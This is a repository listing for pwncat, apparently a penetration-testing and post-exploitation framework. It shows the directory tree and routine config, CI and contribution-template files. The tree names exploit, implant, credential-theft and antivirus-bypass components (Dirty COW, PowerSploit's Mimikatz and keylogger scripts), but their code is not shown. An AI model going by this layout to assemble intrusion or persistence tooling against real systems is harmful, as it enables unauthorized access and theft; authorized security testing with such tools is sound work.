├── .dockerignore
├── .flake8
├── .gitattributes
├── .github
├── ISSUE_TEMPLATE
│ ├── bug_report.md
│ └── feature_request.md
├── PULL_REQUEST_TEMPLATE
│ ├── bug_fix.md
│ ├── feature.md
│ └── module.md
├── pull_request_template.md
└── workflows
│ ├── publish.yml
│ └── python.yml
├── .gitignore
├── .readthedocs.yaml
├── CHANGELOG.md
├── CONTRIBUTING.md
├── Dockerfile
├── IDEAS.md
├── LICENSE.md
├── README.md
├── data
├── dirtycow
│ ├── dirtycow.c
│ └── mini_dirtycow.c
├── pwncat
├── pwncat.pub
└── pwncatrc
├── db
└── .gitkeep
├── docs
├── .gitignore
├── Makefile
├── apidoc
│ ├── module.rst_t
│ ├── package.rst_t
│ ├── package.rst_t.bak
│ └── toc.rst_t
├── make.bat
├── rebuild_api_docs.sh
└── source
│ ├── api
│ ├── pwncat.channel.rst
│ ├── pwncat.commands.rst
│ ├── pwncat.config.rst
│ ├── pwncat.db.rst
│ ├── pwncat.facts.ability.rst
│ ├── pwncat.facts.implant.rst
│ ├── pwncat.facts.linux.rst
│ ├── pwncat.facts.rst
│ ├── pwncat.facts.tamper.rst
│ ├── pwncat.facts.windows.rst
│ ├── pwncat.gtfobins.rst
│ ├── pwncat.manager.rst
│ ├── pwncat.modules.enumerate.rst
│ ├── pwncat.modules.implant.rst
│ ├── pwncat.modules.rst
│ ├── pwncat.platform.linux.rst
│ ├── pwncat.platform.rst
│ ├── pwncat.platform.windows.rst
│ ├── pwncat.rst
│ ├── pwncat.subprocess.rst
│ ├── pwncat.target.rst
│ └── pwncat.util.rst
│ ├── commands
│ ├── alias.rst
│ ├── back.rst
│ ├── bind.rst
│ ├── connect.rst
│ ├── download.rst
│ ├── escalate.rst
│ ├── index.rst
│ ├── info.rst
│ ├── lcd.rst
│ ├── listen.rst
│ ├── listeners.rst
│ ├── load.rst
│ ├── lpwd.rst
│ ├── run.rst
│ ├── search.rst
│ ├── upload.rst
│ └── use.rst
│ ├── conf.py
│ ├── configuration.rst
│ ├── enum.rst
│ ├── index.rst
│ ├── installation.rst
│ ├── modules.rst
│ ├── persist.rst
│ ├── privesc.rst
│ ├── usage.rst
│ └── windows.rst
├── poetry.lock
├── pwncat
├── __init__.py
├── __main__.py
├── channel
│ ├── __init__.py
│ ├── bind.py
│ ├── connect.py
│ ├── socket.py
│ ├── ssh.py
│ ├── ssl_bind.py
│ └── ssl_connect.py
├── commands
│ ├── __init__.py
│ ├── alias.py
│ ├── back.py
│ ├── bind.py
│ ├── connect.py
│ ├── download.py
│ ├── escalate.py
│ ├── exit.py
│ ├── help.py
│ ├── info.py
│ ├── lcd.py
│ ├── leave.py
│ ├── listener_new.py
│ ├── listeners.py
│ ├── load.py
│ ├── local.py
│ ├── lpwd.py
│ ├── reset.py
│ ├── run.py
│ ├── search.py
│ ├── sessions.py
│ ├── set.py
│ ├── shortcut.py
│ ├── upload.py
│ └── use.py
├── config.py
├── data
│ ├── PowerSploit
│ │ ├── .gitignore
│ │ ├── AntivirusBypass
│ │ │ ├── AntivirusBypass.psd1
│ │ │ ├── AntivirusBypass.psm1
│ │ │ ├── Find-AVSignature.ps1
│ │ │ └── Usage.md
│ │ ├── CodeExecution
│ │ │ ├── CodeExecution.psd1
│ │ │ ├── CodeExecution.psm1
│ │ │ ├── Invoke-DllInjection.ps1
│ │ │ ├── Invoke-ReflectivePEInjection.ps1
│ │ │ ├── Invoke-ReflectivePEInjection_Resources
│ │ │ │ ├── DemoDLL
│ │ │ │ │ ├── DemoDLL.sln
│ │ │ │ │ └── DemoDLL
│ │ │ │ │ │ ├── DemoDLL.cpp
│ │ │ │ │ │ ├── DemoDLL.h
│ │ │ │ │ │ ├── DemoDLL.vcxproj
│ │ │ │ │ │ ├── DemoDLL.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ ├── DemoDLL_RemoteProcess
│ │ │ │ │ ├── DemoDLL_RemoteProcess.sln
│ │ │ │ │ └── DemoDLL_RemoteProcess
│ │ │ │ │ │ ├── DemoDLL_RemoteProcess.cpp
│ │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ ├── DemoExe
│ │ │ │ │ ├── DemoExe.sln
│ │ │ │ │ ├── DemoExe_MD
│ │ │ │ │ │ ├── DemoExe_MD.cpp
│ │ │ │ │ │ ├── DemoExe_MD.vcxproj
│ │ │ │ │ │ ├── DemoExe_MD.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ │ └── DemoExe_MDd
│ │ │ │ │ │ ├── DemoExe_MDd.cpp
│ │ │ │ │ │ ├── DemoExe_MDd.vcxproj
│ │ │ │ │ │ ├── DemoExe_MDd.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ ├── ExeToInjectInTo
│ │ │ │ │ ├── ExeToInjectInTo.sln
│ │ │ │ │ └── ExeToInjectInTo
│ │ │ │ │ │ ├── ExeToInjectInTo.cpp
│ │ │ │ │ │ ├── ExeToInjectInTo.vcxproj
│ │ │ │ │ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ └── Shellcode
│ │ │ │ │ ├── readme.txt
│ │ │ │ │ ├── x64
│ │ │ │ │ ├── CallDllMain.asm
│ │ │ │ │ ├── ExitThread.asm
│ │ │ │ │ ├── GetFuncAddress.asm
│ │ │ │ │ └── LoadLibraryA.asm
│ │ │ │ │ └── x86
│ │ │ │ │ ├── CallDllMain.asm
│ │ │ │ │ ├── ExitThread.asm
│ │ │ │ │ └── GetProcAddress.asm
│ │ │ ├── Invoke-Shellcode.ps1
│ │ │ ├── Invoke-WmiCommand.ps1
│ │ │ └── Usage.md
│ │ ├── Exfiltration
│ │ │ ├── Exfiltration.psd1
│ │ │ ├── Exfiltration.psm1
│ │ │ ├── Get-GPPAutologon.ps1
│ │ │ ├── Get-GPPPassword.ps1
│ │ │ ├── Get-Keystrokes.ps1
│ │ │ ├── Get-MicrophoneAudio.ps1
│ │ │ ├── Get-TimedScreenshot.ps1
│ │ │ ├── Get-VaultCredential.ps1
│ │ │ ├── Get-VaultCredential.ps1xml
│ │ │ ├── Invoke-CredentialInjection.ps1
│ │ │ ├── Invoke-Mimikatz.ps1
│ │ │ ├── Invoke-NinjaCopy.ps1
│ │ │ ├── Invoke-TokenManipulation.ps1
│ │ │ ├── LogonUser
│ │ │ │ └── LogonUser
│ │ │ │ │ ├── LogonUser.sln
│ │ │ │ │ ├── LogonUser
│ │ │ │ │ ├── LogonUser.cpp
│ │ │ │ │ ├── LogonUser.vcxproj
│ │ │ │ │ ├── LogonUser.vcxproj.filters
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ │ │ └── logon
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ ├── logon.cpp
│ │ │ │ │ ├── logon.vcxproj
│ │ │ │ │ ├── logon.vcxproj.filters
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ ├── NTFSParser
│ │ │ │ ├── NTFSParser.sln
│ │ │ │ ├── NTFSParser
│ │ │ │ │ ├── NTFS.h
│ │ │ │ │ ├── NTFSParser.cpp
│ │ │ │ │ ├── NTFSParser.vcxproj
│ │ │ │ │ ├── NTFSParser.vcxproj.filters
│ │ │ │ │ ├── NTFS_Attribute.h
│ │ │ │ │ ├── NTFS_Common.h
│ │ │ │ │ ├── NTFS_DataType.h
│ │ │ │ │ ├── NTFS_FileRecord.h
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ │ └── NTFSParserDLL
│ │ │ │ │ ├── NTFS.h
│ │ │ │ │ ├── NTFSParserDLL.cpp
│ │ │ │ │ ├── NTFSParserDLL.vcxproj
│ │ │ │ │ ├── NTFSParserDLL.vcxproj.filters
│ │ │ │ │ ├── NTFS_Attribute.h
│ │ │ │ │ ├── NTFS_Common.h
│ │ │ │ │ ├── NTFS_DataType.h
│ │ │ │ │ ├── NTFS_FileRecord.h
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ ├── Out-Minidump.ps1
│ │ │ ├── Usage.md
│ │ │ └── VolumeShadowCopyTools.ps1
│ │ ├── LICENSE
│ │ ├── Mayhem
│ │ │ ├── Mayhem.psd1
│ │ │ ├── Mayhem.psm1
│ │ │ └── Usage.md
│ │ ├── Persistence
│ │ │ ├── Persistence.psd1
│ │ │ ├── Persistence.psm1
│ │ │ └── Usage.md
│ │ ├── PowerSploit.psd1
│ │ ├── PowerSploit.psm1
│ │ ├── PowerSploit.pssproj
│ │ ├── PowerSploit.sln
│ │ ├── Privesc
│ │ │ ├── Get-System.ps1
│ │ │ ├── PowerUp.ps1
│ │ │ ├── Privesc.psd1
│ │ │ ├── Privesc.psm1
│ │ │ └── README.md
│ │ ├── README.md
│ │ ├── Recon
│ │ │ ├── Dictionaries
│ │ │ │ ├── admin.txt
│ │ │ │ ├── generic.txt
│ │ │ │ └── sharepoint.txt
│ │ │ ├── Get-ComputerDetail.ps1
│ │ │ ├── Get-HttpStatus.ps1
│ │ │ ├── Invoke-CompareAttributesForClass.ps1
│ │ │ ├── Invoke-Portscan.ps1
│ │ │ ├── Invoke-ReverseDnsLookup.ps1
│ │ │ ├── PowerView.ps1
│ │ │ ├── README.md
│ │ │ ├── Recon.psd1
│ │ │ └── Recon.psm1
│ │ ├── ScriptModification
│ │ │ ├── Out-CompressedDll.ps1
│ │ │ ├── Out-EncodedCommand.ps1
│ │ │ ├── Out-EncryptedScript.ps1
│ │ │ ├── Remove-Comment.ps1
│ │ │ ├── ScriptModification.psd1
│ │ │ ├── ScriptModification.psm1
│ │ │ └── Usage.md
│ │ ├── Tests
│ │ │ ├── CodeExecution.tests.ps1
│ │ │ ├── Exfiltration.tests.ps1
│ │ │ ├── PowerSploit.tests.ps1
│ │ │ ├── Privesc.tests.ps1
│ │ │ └── Recon.tests.ps1
│ │ ├── docs
│ │ │ ├── AntivirusBypass
│ │ │ │ └── Find-AVSignature.md
│ │ │ ├── CodeExecution
│ │ │ │ ├── Invoke-DllInjection.md
│ │ │ │ ├── Invoke-ReflectivePEInjection.md
│ │ │ │ ├── Invoke-Shellcode.md
│ │ │ │ └── Invoke-WmiCommand.md
│ │ │ ├── Mayhem
│ │ │ │ ├── Set-CriticalProcess.md
│ │ │ │ └── Set-MasterBootRecord.md
│ │ │ ├── Persistence
│ │ │ │ ├── Add-Persistence.md
│ │ │ │ ├── Get-SecurityPackage.md
│ │ │ │ ├── Install-SSP.md
│ │ │ │ ├── New-ElevatedPersistenceOption.md
│ │ │ │ └── New-UserPersistenceOption.md
│ │ │ ├── Privesc
│ │ │ │ ├── Add-ServiceDacl.md
│ │ │ │ ├── Enable-Privilege.md
│ │ │ │ ├── Find-PathDLLHijack.md
│ │ │ │ ├── Find-ProcessDLLHijack.md
│ │ │ │ ├── Get-ApplicationHost.md
│ │ │ │ ├── Get-CachedGPPPassword.md
│ │ │ │ ├── Get-ModifiablePath.md
│ │ │ │ ├── Get-ModifiableRegistryAutoRun.md
│ │ │ │ ├── Get-ModifiableScheduledTaskFile.md
│ │ │ │ ├── Get-ModifiableService.md
│ │ │ │ ├── Get-ModifiableServiceFile.md
│ │ │ │ ├── Get-ProcessTokenGroup.md
│ │ │ │ ├── Get-ProcessTokenPrivilege.md
│ │ │ │ ├── Get-RegistryAlwaysInstallElevated.md
│ │ │ │ ├── Get-RegistryAutoLogon.md
│ │ │ │ ├── Get-ServiceDetail.md
│ │ │ │ ├── Get-SiteListPassword.md
│ │ │ │ ├── Get-System.md
│ │ │ │ ├── Get-UnattendedInstallFile.md
│ │ │ │ ├── Get-UnquotedService.md
│ │ │ │ ├── Get-WebConfig.md
│ │ │ │ ├── Install-ServiceBinary.md
│ │ │ │ ├── Invoke-PrivescAudit.md
│ │ │ │ ├── Invoke-ServiceAbuse.md
│ │ │ │ ├── Invoke-WScriptUACBypass.md
│ │ │ │ ├── Restore-ServiceBinary.md
│ │ │ │ ├── Set-ServiceBinaryPath.md
│ │ │ │ ├── Test-ServiceDaclPermission.md
│ │ │ │ ├── Write-HijackDll.md
│ │ │ │ ├── Write-ServiceBinary.md
│ │ │ │ ├── Write-UserAddMSI.md
│ │ │ │ └── index.md
│ │ │ ├── Recon
│ │ │ │ ├── Add-DomainGroupMember.md
│ │ │ │ ├── Add-DomainObjectAcl.md
│ │ │ │ ├── Add-RemoteConnection.md
│ │ │ │ ├── Convert-ADName.md
│ │ │ │ ├── ConvertFrom-SID.md
│ │ │ │ ├── ConvertFrom-UACValue.md
│ │ │ │ ├── ConvertTo-SID.md
│ │ │ │ ├── Export-PowerViewCSV.md
│ │ │ │ ├── Find-DomainLocalGroupMember.md
│ │ │ │ ├── Find-DomainObjectPropertyOutlier.md
│ │ │ │ ├── Find-DomainProcess.md
│ │ │ │ ├── Find-DomainShare.md
│ │ │ │ ├── Find-DomainUserEvent.md
│ │ │ │ ├── Find-DomainUserLocation.md
│ │ │ │ ├── Find-InterestingDomainAcl.md
│ │ │ │ ├── Find-InterestingDomainShareFile.md
│ │ │ │ ├── Find-InterestingFile.md
│ │ │ │ ├── Find-LocalAdminAccess.md
│ │ │ │ ├── Get-ComputerDetail.md
│ │ │ │ ├── Get-Domain.md
│ │ │ │ ├── Get-DomainComputer.md
│ │ │ │ ├── Get-DomainController.md
│ │ │ │ ├── Get-DomainDFSShare.md
│ │ │ │ ├── Get-DomainDNSRecord.md
│ │ │ │ ├── Get-DomainDNSZone.md
│ │ │ │ ├── Get-DomainFileServer.md
│ │ │ │ ├── Get-DomainForeignGroupMember.md
│ │ │ │ ├── Get-DomainForeignUser.md
│ │ │ │ ├── Get-DomainGPO.md
│ │ │ │ ├── Get-DomainGPOComputerLocalGroupMapping.md
│ │ │ │ ├── Get-DomainGPOLocalGroup.md
│ │ │ │ ├── Get-DomainGPOUserLocalGroupMapping.md
│ │ │ │ ├── Get-DomainGroup.md
│ │ │ │ ├── Get-DomainGroupMember.md
│ │ │ │ ├── Get-DomainManagedSecurityGroup.md
│ │ │ │ ├── Get-DomainOU.md
│ │ │ │ ├── Get-DomainObject.md
│ │ │ │ ├── Get-DomainObjectAcl.md
│ │ │ │ ├── Get-DomainPolicy.md
│ │ │ │ ├── Get-DomainSID.md
│ │ │ │ ├── Get-DomainSPNTicket.md
│ │ │ │ ├── Get-DomainSite.md
│ │ │ │ ├── Get-DomainSubnet.md
│ │ │ │ ├── Get-DomainTrust.md
│ │ │ │ ├── Get-DomainTrustMapping.md
│ │ │ │ ├── Get-DomainUser.md
│ │ │ │ ├── Get-DomainUserEvent.md
│ │ │ │ ├── Get-Forest.md
│ │ │ │ ├── Get-ForestDomain.md
│ │ │ │ ├── Get-ForestGlobalCatalog.md
│ │ │ │ ├── Get-ForestTrust.md
│ │ │ │ ├── Get-HttpStatus.md
│ │ │ │ ├── Get-NetComputerSiteName.md
│ │ │ │ ├── Get-NetLocalGroup.md
│ │ │ │ ├── Get-NetLocalGroupMember.md
│ │ │ │ ├── Get-NetLoggedon.md
│ │ │ │ ├── Get-NetRDPSession.md
│ │ │ │ ├── Get-NetSession.md
│ │ │ │ ├── Get-NetShare.md
│ │ │ │ ├── Get-PathAcl.md
│ │ │ │ ├── Get-RegLoggedOn.md
│ │ │ │ ├── Get-WMIProcess.md
│ │ │ │ ├── Get-WMIRegCachedRDPConnection.md
│ │ │ │ ├── Get-WMIRegLastLoggedOn.md
│ │ │ │ ├── Get-WMIRegMountedDrive.md
│ │ │ │ ├── Get-WMIRegProxy.md
│ │ │ │ ├── Invoke-Kerberoast.md
│ │ │ │ ├── Invoke-Portscan.md
│ │ │ │ ├── Invoke-ReverseDnsLookup.md
│ │ │ │ ├── Invoke-RevertToSelf.md
│ │ │ │ ├── Invoke-UserImpersonation.md
│ │ │ │ ├── New-DomainGroup.md
│ │ │ │ ├── New-DomainUser.md
│ │ │ │ ├── Remove-RemoteConnection.md
│ │ │ │ ├── Resolve-IPAddress.md
│ │ │ │ ├── Set-DomainObject.md
│ │ │ │ ├── Set-DomainObjectOwner.md
│ │ │ │ ├── Set-DomainUserPassword.md
│ │ │ │ ├── Test-AdminAccess.md
│ │ │ │ └── index.md
│ │ │ ├── ScriptModification
│ │ │ │ ├── Out-CompressedDll.md
│ │ │ │ ├── Out-EncodedCommand.md
│ │ │ │ ├── Out-EncryptedScript.md
│ │ │ │ └── Remove-Comment.md
│ │ │ └── index.md
│ │ └── mkdocs.yml
│ ├── gtfobins.json
│ ├── lester.json
│ ├── loader.dll
│ ├── pam.c
│ ├── reports
│ │ ├── generic.md
│ │ ├── linux.md
│ │ └── windows.md
│ └── stagetwo.dll
├── db.py
├── facts
│ ├── __init__.py
│ ├── ability.py
│ ├── implant.py
│ ├── linux.py
│ ├── tamper.py
│ └── windows.py
├── gtfobins.py
├── manager.py
├── modules
│ ├── __init__.py
│ ├── agnostic
│ │ ├── __init__.py
│ │ ├── clean.py
│ │ ├── enumerate
│ │ │ ├── __init__.py
│ │ │ ├── ability.py
│ │ │ ├── escalate
│ │ │ │ ├── __init__.py
│ │ │ │ ├── implant.py
│ │ │ │ └── replace.py
│ │ │ └── gather.py
│ │ ├── implant.py
│ │ └── report.py
│ ├── enumerate.py
│ ├── implant.py
│ ├── linux
│ │ ├── __init__.py
│ │ ├── enumerate
│ │ │ ├── __init__.py
│ │ │ ├── creds
│ │ │ │ ├── __init__.py
│ │ │ │ ├── pam.py
│ │ │ │ ├── password.py
│ │ │ │ └── private_key.py
│ │ │ ├── escalate
│ │ │ │ ├── __init__.py
│ │ │ │ ├── append_passwd.py
│ │ │ │ ├── leak_privkey.py
│ │ │ │ └── write_authorized_keys.py
│ │ │ ├── file
│ │ │ │ ├── __init__.py
│ │ │ │ ├── caps.py
│ │ │ │ └── suid.py
│ │ │ ├── misc
│ │ │ │ ├── __init__.py
│ │ │ │ └── writable_path.py
│ │ │ ├── software
│ │ │ │ ├── __init__.py
│ │ │ │ ├── cron.py
│ │ │ │ ├── screen
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── cve_2017_5618.py
│ │ │ │ └── sudo
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── cve_2019_14287.py
│ │ │ │ │ ├── rules.py
│ │ │ │ │ └── version.py
│ │ │ ├── system
│ │ │ │ ├── __init__.py
│ │ │ │ ├── aslr.py
│ │ │ │ ├── container.py
│ │ │ │ ├── distro.py
│ │ │ │ ├── fstab.py
│ │ │ │ ├── hosts.py
│ │ │ │ ├── init.py
│ │ │ │ ├── network.py
│ │ │ │ ├── process.py
│ │ │ │ ├── selinux.py
│ │ │ │ ├── services.py
│ │ │ │ └── uname.py
│ │ │ └── user
│ │ │ │ ├── __init__.py
│ │ │ │ └── group.py
│ │ └── implant
│ │ │ ├── __init__.py
│ │ │ ├── authorized_key.py
│ │ │ ├── pam.py
│ │ │ └── passwd.py
│ └── windows
│ │ ├── __init__.py
│ │ ├── bloodhound.py
│ │ ├── enumerate
│ │ ├── __init__.py
│ │ ├── domain
│ │ │ ├── __init__.py
│ │ │ ├── computer.py
│ │ │ ├── fileserver.py
│ │ │ ├── group.py
│ │ │ ├── site.py
│ │ │ └── user.py
│ │ ├── network
│ │ │ ├── __init__.py
│ │ │ └── shares.py
│ │ ├── protections
│ │ │ ├── __init__.py
│ │ │ ├── antivirus.py
│ │ │ ├── defender.py
│ │ │ ├── lsa.py
│ │ │ └── uac.py
│ │ ├── system
│ │ │ ├── __init__.py
│ │ │ ├── alwaysinstallelevated.py
│ │ │ ├── clipboard.py
│ │ │ ├── drives.py
│ │ │ ├── environment.py
│ │ │ ├── hotfixes.py
│ │ │ ├── processes.py
│ │ │ ├── programs.py
│ │ │ └── services.py
│ │ ├── token
│ │ │ ├── __init__.py
│ │ │ ├── potato.py
│ │ │ └── privs.py
│ │ └── user
│ │ │ ├── __init__.py
│ │ │ └── group.py
│ │ ├── manage
│ │ ├── __init__.py
│ │ └── powershell
│ │ │ ├── __init__.py
│ │ │ └── import.py
│ │ └── powersploit.py
├── platform
│ ├── __init__.py
│ ├── linux.py
│ └── windows.py
├── subprocess.py
├── target.py
└── util.py
├── pwncatrc
├── pyproject.toml
├── run-tests.sh
├── test.py
└── tests
├── conftest.py
├── test_fileio.py
├── test_manager.py
├── test_platform.py
├── test_session.py
└── test_test.py
/.dockerignore:
--------------------------------------------------------------------------------
1 | data/
2 | .github/
3 | tests/
4 | docs/
5 | db/
6 | *.md
7 | *.txt
8 | *.sh
9 | test.py
10 | .flake8
11 | .gitattributes
12 | .gitignore
13 | .git/
14 | !README.md
15 |
--------------------------------------------------------------------------------
/.flake8:
--------------------------------------------------------------------------------
1 | [flake8]
2 | ignore=E501,E123,E121,E126,E133,E203,W505,W503,W504
3 | exclude=.git,__pycache__,pwncat.egg-info,env,dist,build,data,docs,tests,test.py
4 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | pwncat/data/PowerSploit/**/*.ps1 linguist-vendored
2 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ""
5 | labels: bug
6 | assignees: ''
7 | ---
8 |
9 |
12 |
13 | ## Bug Description
14 | A clear and concise description of what the bug is.
15 |
16 | ## pwncat version
17 | Provide the output of `pwncat --version` or a commit hash if working from
18 | a development branch.
19 |
20 | ```
21 | $ pwncat --version
22 | 0.4.2
23 | ```
24 |
25 | ## Target System (aka "victim")
26 | Provide as much detail about the target host as possible. If this is a TryHackMe
27 | or Hack The Box or similar machine, please provide the machine name and/or link
28 | as well.
29 |
30 | ## Steps to Reproduce
31 | Steps to reproduce the behavior:
32 | 1. Go to '...'
33 | 2. Click on '....'
34 | 3. Scroll down to '....'
35 | 4. See error
36 |
37 | ## Expected Behavior
38 | A clear and concise description of what you expected to happen.
39 |
40 | ## Screenshots
41 | If applicable, add screenshots to help explain your problem.
42 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: enhancement
6 | assignees: ''
7 | ---
8 |
9 | ## Is the feature related to a problem? Please describe.
10 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
11 |
12 | ## Feature Description
13 | A clear and concise description of what you want to happen.
14 |
15 | ## Alternatives
16 | A clear and concise description of any alternative solutions or features you've considered.
17 |
18 | ## Additional Context
19 | Add any other context or screenshots about the feature request here.
20 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE/bug_fix.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug/Issue Fix
3 | about: Merge changes to fix an outstanding bug/issue
4 | title: "[FIX #XXX] "
5 | labels: fix
6 | assignees: ""
7 | ---
8 | Fixes #.
9 |
10 | Changes proposed in this pull request:
11 | -
12 | -
13 | -
14 |
15 | **note - remove following before post submitting, please :)**
16 |
17 | The following should be completed before opening a pull request:
18 |
19 | - `isort` any modified files.
20 | - `black` format any modified files
21 | - Correct any outstanding `flake8` errors.
22 | - Note any `noqa:` comments need in your PR to appease flake.
23 |
24 | Include a description of your fix in the body, and enumerate any
25 | changes which could have external consequences/sid-effects. Think
26 | about things like API or usage changes.
27 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE/feature.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature Implementation
3 | about: Merge changes to add a new feature
4 | title: "[FEATURE] "
5 | labels: enhancement
6 | assignees: ""
7 | ---
8 |
9 | Describe the changes you've made and how they improve the framework.
10 |
11 | Changes proposed in this pull request:
12 | - Enumerate high-level changes made to the framework here.
13 | - Thinkg about how this change/feature changes the API or usage.
14 |
15 | **note - remove following before post submitting, please :)**
16 |
17 | The following should be completed before opening a pull request:
18 |
19 | - `isort` any modified files.
20 | - `black` format any modified files
21 | - Correct any outstanding `flake8` errors.
22 | - Note any `noqa:` comments needed to appease flake above.
23 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE/module.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: New Module
3 | about: Merge changes to add a new pwncat module
4 | title: "[NEW-MODULE] "
5 | labels:
6 | - enhancement
7 | - new-module
8 | assignees: ""
9 | ---
10 |
11 | **Module Goals**
12 | *Describe in detail what your module is for, and how it accomplishes
13 | the task from a technical standpoint.*
14 |
15 | **Platform Restrictions:**
16 | *Linux/Windows/None/etc*
17 |
18 | **Fully Qualified Name:**
19 | *enumerate.something.cool*
20 |
21 | **Environment Restrictions:**
22 | *Anything that is required in the environment for the module to function*
23 |
24 | **Artifacts Generated:**
25 | *List any artifacts that this module may generate on the victim*
26 |
27 | **Tested Targets**
28 | *Where have you tested this module? What have you done to test against
29 | verious distributions/systems and ensure wide-coverage? Does the module
30 | behave properly (e.g. raise appropriate exception, fail silently) if the
31 | environment doesn't match?*
32 |
33 | **note - remove following before post submitting, please :)**
34 |
35 | The following should be completed before opening a pull request:
36 |
37 | - `isort` any modified files.
38 | - `black` format any modified files
39 | - Correct any outstanding `flake8` errors.
40 | - Note any `noqa:` comments need in your PR to appease flake.
41 |
--------------------------------------------------------------------------------
/.github/pull_request_template.md:
--------------------------------------------------------------------------------
1 | ## Description of Changes
2 |
3 | Fixes #XXX.
4 |
5 | **Please note any `noqa:` comments needed to appease flake8.**
6 |
7 | ## Major Changes Implemented:
8 | -
9 | -
10 | -
11 |
12 | ## Pre-Merge Tasks
13 | - [ ] Formatted all modified files w/ `python-black`
14 | - [ ] Sorted imports for modified files w/ `isort`
15 | - [ ] Ran `flake8` on repo, and fixed any new problems w/ modified files
16 | - [ ] Ran `pytest` test cases
17 | - [ ] Added brief summary of updates to CHANGELOG (under `[Unreleased]`)
18 |
19 | **For issues with pre-merge tasks, see CONTRIBUTING.md**
20 |
21 |
37 |
--------------------------------------------------------------------------------
/.github/workflows/python.yml:
--------------------------------------------------------------------------------
1 | name: Python Checks
2 | on:
3 | workflow_dispatch:
4 |
5 | jobs:
6 | testing:
7 | runs-on: ubuntu-latest
8 |
9 | strategy:
10 | matrix:
11 | python-versions: [3.8,3.9]
12 |
13 | services:
14 | centos:
15 | image: calebjstewart/pwncat-testing:centos
16 | ports:
17 | - 4444:4444
18 | ubuntu:
19 | image: calebjstewart/pwncat-testing:ubuntu
20 | ports:
21 | - 4445:4444
22 |
23 | steps:
24 | - uses: actions/checkout@v2
25 | - name: Set up Python ${{ matrix.python-version }}
26 | uses: actions/setup-python@v2
27 | with:
28 | python-version: ${{ matrix.python-version }}
29 | - name: Install pwncat
30 | run: |
31 | python -m pip install --upgrade pip
32 | pip install flake8 pytest
33 | pip install -r requirements.txt
34 | python setup.py install --user
35 | # - name: Lint with flake8
36 | # run: |
37 | # flake8
38 | - name: Test with pytest
39 | env:
40 | CENTOS_HOST: "127.0.0.1"
41 | CENTOS_BIND_PORT: "4444"
42 | UBUNTU_HOST: "127.0.0.1"
43 | UBUNTU_BIND_PORT: "4445"
44 | run: |
45 | pytest
46 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | env/
2 | **/*.pyc
3 | **/__pycache__/
4 | **/*.egg-info/
5 | build/
6 | dist/
7 | .byebug_history
8 | testbed
9 | .idea/
10 | **/*.sqlite
11 | testing/
12 | data/pwncat.sqlite-journal
13 | pwncat.sqlite-journal
14 | linpeas.txt
15 | NOTES.md
16 | db/pwncat*
17 |
--------------------------------------------------------------------------------
/.readthedocs.yaml:
--------------------------------------------------------------------------------
1 | version: 2
2 |
3 | build:
4 | os: ubuntu-20.04
5 | tools:
6 | python: "3.9"
7 |
8 | sphinx:
9 | configuration: docs/source/conf.py
10 |
11 | python:
12 | install:
13 | - method: pip
14 | path: .
15 | extra_requirements:
16 | - docs
17 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.9-alpine as builder
2 |
3 | # Install python3 and development files
4 | RUN set -eux \
5 | && apk add --no-cache \
6 | alpine-sdk \
7 | libffi-dev \
8 | linux-headers \
9 | openssl-dev \
10 | musl-dev \
11 | cargo \
12 | libstdc++
13 |
14 | # Copy pwncat source
15 | COPY . /opt/pwncat
16 |
17 | # Setup virtual environment
18 | RUN set -eux \
19 | && python -m pip install -U pip setuptools wheel setuptools_rust
20 |
